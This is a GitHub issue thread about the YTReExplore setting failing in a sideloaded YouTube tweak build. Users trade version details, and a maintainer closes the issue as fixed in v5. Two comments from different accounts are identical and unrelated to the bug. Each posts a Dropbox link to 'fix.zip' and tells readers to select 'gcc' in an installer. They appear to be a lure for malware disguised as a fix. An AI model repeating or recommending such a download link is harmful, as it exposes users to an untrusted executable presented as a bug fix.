### ISSUE TITLE
[Bug] YTReExplore no longer works (YouTube v19.33.2+)

### ISSUE THREAD

**Issue by arichornloverALT** [YTLitePlus/YTLitePlus#374]
### Is there an existing issue for this?

- [X] I have searched the existing issues

### iOS/iPadOS version

iOS 17.6.1

### Device model

iPad Pro 10.5

### Sideload method

AltStore

### Tweak version

YTLitePlus - v19.33.2-4.0.1

### Do you use YouTube Premium?

❌ No, I don't use YouTube Premium

### Are you using the newest version of YTLitePlus?

❌ No, I'll explain at the end

### Does the issue happen with the official YouTube from AppStore?

❌ No, I can't reproduce this issue in the official YouTube from AppStore

### Method used to build the iPA

buildapp.yml (GitHub Actions)

### Describe the bug

I recently updated from **19.29.1** to **19.33.2** and noticed that YTReExplore unfortunately doesn’t work. So what I’m thinking is that Google removed the **Explore Tab**.
![IMG_2140](https://github.com/user-attachments/assets/c6ee3133-c323-4ede-8d2d-f7ac328b581f)

### Steps to reproduce the issue

1. Go to YTLite (or YouTube Plus) settings
2. Enable an option that has the words **YTReExplore**
3. Once enabled, restart the app and it won’t do anything.

### Additional context

This one was my own YTLitePlus ipa. I built my own which explains why I said no to `Are you using the newest version of YTLitePlus?`

**Comment by seeronline** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by IvanJrX** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by Yunogamer** [comment]
mine is fine on 19.33.2-4.0.1?

**Comment by dora727** [comment]
fyi in ytlite v5 it has an option to rearrange tab bar
and it has an option of explore tab

so, is this duplicated to that?
also related to #323 ig
![IMG_9469](https://github.com/user-attachments/assets/5d73a490-3a12-4475-98b6-d39f302f85dd)
![IMG_9470](https://github.com/user-attachments/assets/9aa2fdad-f668-4b9d-a6b9-014b0737b1e9)

**Comment by bhackel** [comment]
Setting seems to be fixed in v5, so I will be closing this now
